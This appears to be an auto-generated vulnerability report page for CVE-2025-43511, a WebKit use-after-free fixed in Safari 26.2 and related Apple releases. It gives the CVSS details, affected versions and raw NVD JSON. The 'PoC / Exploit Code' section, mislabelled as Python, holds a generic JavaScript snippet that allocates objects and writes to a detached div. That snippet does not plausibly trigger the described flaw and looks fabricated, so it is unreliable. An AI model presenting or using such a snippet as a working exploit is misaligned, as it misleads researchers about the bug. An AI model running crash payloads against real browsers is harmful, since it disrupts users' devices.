Security Vulnerability Report
中文
CVE-2025-43511 CVSS 6.5 MEDIUM

CVE-2025-43511

Published: 2025-12-12 21:15:56
Last Modified: 2026-04-02 19:20:58
Source: [email protected]

Description

A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.2, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.2
iOS < 18.7.2
iPadOS < 18.7.2
iOS < 26.2
iPadOS < 26.2
macOS Tahoe < 26.2
visionOS < 26.2
watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- POC for CVE-2025-43511 Use-After-Free --> <script> // 触发条件:构造快速创建和销毁的对象,尝试在对象释放后访问其属性 function triggerUAF() { // 创建大量对象以触发垃圾回收 let objects = []; for (let i = 0; i < 10000; i++) { objects.push({data: new Array(1000)}); } // 清除引用触发回收 objects = null; // 尝试触发垃圾回收 if (window.gc) { window.gc(); } // 重新创建对象以改变堆状态 setTimeout(() => { let newObj = {target: document.createElement('div')}; // 触发DOM操作 document.body.appendChild(newObj.target); document.body.removeChild(newObj.target); // 尝试访问已释放的DOM节点 try { newObj.target.innerHTML = 'test'; } catch(e) { console.log('UAF triggered: ' + e.message); } }, 100); } // 多次触发以增加成功率 for (let i = 0; i < 10; i++) { triggerUAF(); } </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43511", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:56.000", "lastModified": "2026-04-02T19:20:57.537", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.2, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.2", "matchCriteriaId": "819E8F86-A336-49A2-853F-249459279A59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.2", "matchCriteriaId": "7B98B4A6-EFB0-4651-BF56-06917E7CEC85"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125633", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125884", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.